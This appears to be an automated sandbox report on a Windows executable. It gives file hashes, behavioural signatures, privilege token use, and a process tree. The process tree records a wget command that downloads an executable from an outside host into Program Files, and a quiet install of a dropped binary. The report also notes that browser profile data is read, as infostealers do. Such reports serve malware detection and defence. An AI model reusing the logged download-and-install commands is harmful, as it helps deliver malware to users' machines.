Analysis
max time kernel: 106s
max time network: 136s
platform: windows10-2004_x64
resource: win10v2004-20220901-en
resource tags: arch:x64, arch:x86, image:win10v2004-20220901-en, locale:en-us, os:windows10-2004-x64, system
submitted: 19-09-2022 12:28
Static task: static1
Behavioral task: behavioral1
Sample: 01955fac3fc219bb9e9863e5e4c5960c6c8c9fad590c20c4eba837c412a1cb26.exe
Resource: win7-20220812-en
General
Target: 01955fac3fc219bb9e9863e5e4c5960c6c8c9fad590c20c4eba837c412a1cb26.exe
Size: 626KB
MD5: 123dbc5d23301b384f8796fe9ab2f278
SHA1: 38271921f6fc9a3dbd75224670f9603ab1248d73
SHA256: 01955fac3fc219bb9e9863e5e4c5960c6c8c9fad590c20c4eba837c412a1cb26
SHA512: ec16ef0b83c591b73b4b907ae71511134c9d9d80a646f6c0187e8da21c226378e90285466f2094e0f7a8d795e17eeb2b97915a480826efec698c5aaf8c8b6a34
SSDEEP: 6144:+txgWaPErW1civwXSBxl7ju04CfOf/3ix/YheJvm3WeFAiAuzCe8JikKN0Y4RqCV:kGWgvxl7yC2nixMeJqLFPOikKad1KOl
Malware Config
Signatures

Executes dropped EXE (2 IoCs)
  pid   Process
  3700  wget.exe
  3500  cmd.exe

Loads dropped DLL (2 IoCs)
  pid   Process
  804   MsiExec.exe
  804   MsiExec.exe

Reads user/profile data of web browsers (2 TTPs)
  Infostealers often target stored browser data, which can include saved credentials etc.

Enumerates connected drives (3 TTPs, 48 IoCs)
  Attempts to read the root path of hard drives other than the default C: drive.
  description              ioc      Process
  File opened (read-only)  \??\I:   msiexec.exe
  File opened (read-only)  \??\Q:   msiexec.exe
  File opened (read-only)  \??\W:   msiexec.exe
  File opened (read-only)  \??\I:   cmd.exe
  File opened (read-only)  \??\J:   cmd.exe
  File opened (read-only)  \??\L:   cmd.exe
  File opened (read-only)  \??\P:   cmd.exe
  File opened (read-only)  \??\G:   msiexec.exe
  File opened (read-only)  \??\R:   msiexec.exe
  File opened (read-only)  \??\U:   msiexec.exe
  File opened (read-only)  \??\Y:   msiexec.exe
  File opened (read-only)  \??\A:   cmd.exe
  File opened (read-only)  \??\V:   cmd.exe
  File opened (read-only)  \??\H:   msiexec.exe
  File opened (read-only)  \??\K:   msiexec.exe
  File opened (read-only)  \??\B:   cmd.exe
  File opened (read-only)  \??\K:   cmd.exe
  File opened (read-only)  \??\T:   cmd.exe
  File opened (read-only)  \??\X:   cmd.exe
  File opened (read-only)  \??\E:   msiexec.exe
  File opened (read-only)  \??\J:   msiexec.exe
  File opened (read-only)  \??\M:   cmd.exe
  File opened (read-only)  \??\U:   cmd.exe
  File opened (read-only)  \??\F:   msiexec.exe
  File opened (read-only)  \??\F:   cmd.exe
  File opened (read-only)  \??\O:   cmd.exe
  File opened (read-only)  \??\N:   msiexec.exe
  File opened (read-only)  \??\L:   msiexec.exe
  File opened (read-only)  \??\P:   msiexec.exe
  File opened (read-only)  \??\S:   msiexec.exe
  File opened (read-only)  \??\V:   msiexec.exe
  File opened (read-only)  \??\G:   cmd.exe
  File opened (read-only)  \??\W:   cmd.exe
  File opened (read-only)  \??\A:   msiexec.exe
  File opened (read-only)  \??\O:   msiexec.exe
  File opened (read-only)  \??\T:   msiexec.exe
  File opened (read-only)  \??\Z:   msiexec.exe
  File opened (read-only)  \??\E:   cmd.exe
  File opened (read-only)  \??\H:   cmd.exe
  File opened (read-only)  \??\R:   cmd.exe
  File opened (read-only)  \??\Y:   cmd.exe
  File opened (read-only)  \??\B:   msiexec.exe
  File opened (read-only)  \??\X:   msiexec.exe
  File opened (read-only)  \??\N:   cmd.exe
  File opened (read-only)  \??\Q:   cmd.exe
  File opened (read-only)  \??\S:   cmd.exe
  File opened (read-only)  \??\Z:   cmd.exe
  File opened (read-only)  \??\M:   msiexec.exe

Drops file in Program Files directory (2 IoCs)
  description   ioc                                                        Process
  File created  C:\Program Files\Common Files\pipi_dae_484.exe             wget.exe
  File created  C:\Program Files (x86)\Your Company\Your Application\ .txt  msiexec.exe

Drops file in Windows directory (9 IoCs)
  description                   ioc                                                                  Process
  File opened for modification  C:\Windows\Installer\e56d101.msi                                     msiexec.exe
  File opened for modification  C:\Windows\Installer\MSID268.tmp                                     msiexec.exe
  File opened for modification  C:\Windows\Installer\MSID538.tmp                                     msiexec.exe
  File opened for modification  C:\Windows\Installer\MSID97E.tmp                                     msiexec.exe
  File created                  C:\Windows\Installer\e56d101.msi                                     msiexec.exe
  File opened for modification  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log             msiexec.exe
  File opened for modification  C:\Windows\Installer\                                                msiexec.exe
  File created                  C:\Windows\Installer\inprogressinstallinfo.ipi                       msiexec.exe
  File created                  C:\Windows\Installer\SourceHash{C21911F7-A2B3-4D84-8C57-555CF73DFB48}  msiexec.exe

Modifies data under HKEY_USERS (5 IoCs)
  description  ioc                                                                        Process
  Key deleted  \REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\1F           msiexec.exe
  Key created  \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\20           msiexec.exe
  Key deleted  \REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\1E\52C64B7E  msiexec.exe
  Key deleted  \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e           msiexec.exe
  Key created  \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1f           msiexec.exe

Runs ping.exe (1 TTPs, 1 IoCs)
  pid   Process
  1788  PING.EXE

Suspicious behavior: EnumeratesProcesses (2 IoCs)
  pid   Process
  3092  msiexec.exe
  3092  msiexec.exe

Suspicious use of AdjustPrivilegeToken (44 IoCs)
  description                           pid   Process
  Token: SeShutdownPrivilege            3500  cmd.exe
  Token: SeIncreaseQuotaPrivilege       3500  cmd.exe
  Token: SeSecurityPrivilege            3092  msiexec.exe
  Token: SeCreateTokenPrivilege         3500  cmd.exe
  Token: SeAssignPrimaryTokenPrivilege  3500  cmd.exe
  Token: SeLockMemoryPrivilege          3500  cmd.exe
  Token: SeIncreaseQuotaPrivilege       3500  cmd.exe
  Token: SeMachineAccountPrivilege      3500  cmd.exe
  Token: SeTcbPrivilege                 3500  cmd.exe
  Token: SeSecurityPrivilege            3500  cmd.exe
  Token: SeTakeOwnershipPrivilege       3500  cmd.exe
  Token: SeLoadDriverPrivilege          3500  cmd.exe
  Token: SeSystemProfilePrivilege       3500  cmd.exe
  Token: SeSystemtimePrivilege          3500  cmd.exe
  Token: SeProfSingleProcessPrivilege   3500  cmd.exe
  Token: SeIncBasePriorityPrivilege     3500  cmd.exe
  Token: SeCreatePagefilePrivilege      3500  cmd.exe
  Token: SeCreatePermanentPrivilege     3500  cmd.exe
  Token: SeBackupPrivilege              3500  cmd.exe
  Token: SeRestorePrivilege             3500  cmd.exe
  Token: SeShutdownPrivilege            3500  cmd.exe
  Token: SeDebugPrivilege               3500  cmd.exe
  Token: SeAuditPrivilege               3500  cmd.exe
  Token: SeSystemEnvironmentPrivilege   3500  cmd.exe
  Token: SeChangeNotifyPrivilege        3500  cmd.exe
  Token: SeRemoteShutdownPrivilege      3500  cmd.exe
  Token: SeUndockPrivilege              3500  cmd.exe
  Token: SeSyncAgentPrivilege           3500  cmd.exe
  Token: SeEnableDelegationPrivilege    3500  cmd.exe
  Token: SeManageVolumePrivilege        3500  cmd.exe
  Token: SeImpersonatePrivilege         3500  cmd.exe
  Token: SeCreateGlobalPrivilege        3500  cmd.exe
  Token: SeRestorePrivilege             3092  msiexec.exe
  Token: SeTakeOwnershipPrivilege       3092  msiexec.exe
  Token: SeRestorePrivilege             3092  msiexec.exe
  Token: SeTakeOwnershipPrivilege       3092  msiexec.exe
  Token: SeRestorePrivilege             3092  msiexec.exe
  Token: SeTakeOwnershipPrivilege       3092  msiexec.exe
  Token: SeRestorePrivilege             3092  msiexec.exe
  Token: SeTakeOwnershipPrivilege       3092  msiexec.exe
  Token: SeRestorePrivilege             3092  msiexec.exe
  Token: SeTakeOwnershipPrivilege       3092  msiexec.exe
  Token: SeRestorePrivilege             3092  msiexec.exe
  Token: SeTakeOwnershipPrivilege       3092  msiexec.exe

Suspicious use of WriteProcessMemory (15 IoCs)
  description                    pid   Process                                                                  procid_target
  PID 1648 wrote to memory of 2368  1648  01955fac3fc219bb9e9863e5e4c5960c6c8c9fad590c20c4eba837c412a1cb26.exe  84
  PID 1648 wrote to memory of 2368  1648  01955fac3fc219bb9e9863e5e4c5960c6c8c9fad590c20c4eba837c412a1cb26.exe  84
  PID 1648 wrote to memory of 2368  1648  01955fac3fc219bb9e9863e5e4c5960c6c8c9fad590c20c4eba837c412a1cb26.exe  84
  PID 2368 wrote to memory of 3700  2368  cmd.exe                                                                  86
  PID 2368 wrote to memory of 3700  2368  cmd.exe                                                                  86
  PID 2368 wrote to memory of 3700  2368  cmd.exe                                                                  86
  PID 2368 wrote to memory of 3500  2368  cmd.exe                                                                  87
  PID 2368 wrote to memory of 3500  2368  cmd.exe                                                                  87
  PID 2368 wrote to memory of 3500  2368  cmd.exe                                                                  87
  PID 3092 wrote to memory of 804   3092  msiexec.exe                                                              90
  PID 3092 wrote to memory of 804   3092  msiexec.exe                                                              90
  PID 3092 wrote to memory of 804   3092  msiexec.exe                                                              90
  PID 2368 wrote to memory of 1788  2368  cmd.exe                                                                  93
  PID 2368 wrote to memory of 1788  2368  cmd.exe                                                                  93
  PID 2368 wrote to memory of 1788  2368  cmd.exe                                                                  93
Processes

C:\Users\Admin\AppData\Local\Temp\01955fac3fc219bb9e9863e5e4c5960c6c8c9fad590c20c4eba837c412a1cb26.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\01955fac3fc219bb9e9863e5e4c5960c6c8c9fad590c20c4eba837c412a1cb26.exe"
  - Suspicious use of WriteProcessMemory
  PID: 1648

  C:\Windows\SysWOW64\cmd.exe
    Command line: cmd.exe /c C:\Users\Admin\AppData\Local\Temp\~C122.bat "C:\Users\Admin\AppData\Local\Temp\01955fac3fc219bb9e9863e5e4c5960c6c8c9fad590c20c4eba837c412a1cb26.exe"
    - Suspicious use of WriteProcessMemory
    PID: 2368

    C:\Users\Admin\AppData\Local\wget.exe
      Command line: "C:\Users\Admin\AppData\Local\wget.exe" http://dl.pipi.cn/pipi_dae_484.exe -O "C:\Program Files\Common Files\pipi_dae_484.exe"
      - Executes dropped EXE
      - Drops file in Program Files directory
      PID: 3700

    C:\Users\Admin\AppData\Local\cmd.exe
      Command line: "C:\Users\Admin\AppData\Local\cmd.exe" /i "C:\Users\Admin\AppData\Local\9pipi.ini" /quiet
      - Executes dropped EXE
      - Enumerates connected drives
      - Suspicious use of AdjustPrivilegeToken
      PID: 3500

    C:\Windows\SysWOW64\PING.EXE
      Command line: ping 127.0.0.1 -n 10
      - Runs ping.exe
      PID: 1788

C:\Windows\system32\msiexec.exe
  Command line: C:\Windows\system32\msiexec.exe /V
  - Enumerates connected drives
  - Drops file in Program Files directory
  - Drops file in Windows directory
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID: 3092

  C:\Windows\syswow64\MsiExec.exe
    Command line: C:\Windows\syswow64\MsiExec.exe -Embedding 749375500B2C2001C282E25029E2B1E5
    - Loads dropped DLL
    PID: 804
Network
MITRE ATT&CK Enterprise v6
Downloads

Filesize: 227KB
MD5: aaa7da2ac3db6912eb76a213a0da27bc
SHA1: 1900552113d9b9d99e5160e8b4bdf1f5922a50a5
SHA256: 007c888ab92ded5de5ec53a276c7e8c3b048fc5bcd647fc56b7b7ed96920c1f6
SHA512: adac0d9ed4f2ecc7cb5cc111ee63d0189cdd9aa447b343b69072d6fdb4db8bbb167ed513a21518c0538d8d62ddcf25db6c62546b9c575398e5c35fec2a9d9fb2

Filesize: 650B
MD5: 4924a3028090a80addbdedcea6ee7ba3
SHA1: 53944f1900bc7dcf3b43b117e5a11affcfe793cb
SHA256: dd0ea2e10a170157f6e94db7f2926f8a9c7041a6a479a6830b57b6c333b4ccfc
SHA512: 739023e51a59c71f374e9c44ad895ffe7e3e12664faf946ef52acf11f8f24378d1d1932919b1ab0842d596ebb84cdc3a2716e41dc26b3295671ed1dda6565d37

Filesize: 309B
MD5: a167cf2a3d0c4ae66d94d56fdfdd07d5
SHA1: f5446d546aaf51d803b6c7cd86985619953317ac
SHA256: bb74012d828ac25079e3b132be116ea702b5fc225c946a2f4294ebeea2a38fed
SHA512: 9b48cd34bfea72c362d0cf8999383553a54c2cdbf41ddd52aa8e599d1ed999fef58695fda841d14180893006425c36233ed9b9e1ac2a4d3cef7bc7112748f7f2

Filesize: 77KB
MD5: 6c985ebcd34f92d666b365b28272195f
SHA1: 03b8d4cf8171b650ed68efc3c41258878c35d433
SHA256: a49ba96ce00aa92df7291454208637538af31c6df4dfc268c1dd8463a0d65c99
SHA512: c8879889fdc80caa97445e1b5e716ae6e5223fd06634d1957cf7da20c1aefe866e45513e8ce6adf2ddc396702ac720f0f56f961051053c7980a426c3da090f70

Filesize: 248KB
MD5: 9ba065cdd2ef00f38eacde05d6606563
SHA1: a5a1d20bb1456bcbefc689f16f38b0710259b414
SHA256: 0f18a55c0c3c386291aaf61a82f21486f9c5f0d83a78f7702b91eec841410fef
SHA512: 3f302d33ec25c89e8bea581f9de1ae1409cb6b35bf6a27939b1461ea32954e5424546c0cfe2428ff850f4b962ae2cd86f090c8d45935b0c0bd5b9ba91ed0b262

Filesize: 48KB
MD5: 9067aad412defc0d2888479609041392
SHA1: 36cfffc3bafeb24f88ad5886ca5787ca008b6ba9
SHA256: 99f4e00b6908057a2fe5067ff6c8b6e32b5c07558ab79139dc4b998f1da4b517
SHA512: e69f259d78b02e6c1a5d9c45898b59372329a5288fff655dd741353f112b2b8eed18b01caa2bf312a91f5e314e1c0b036321b37c8efbebdcf3650ba6b12dee6a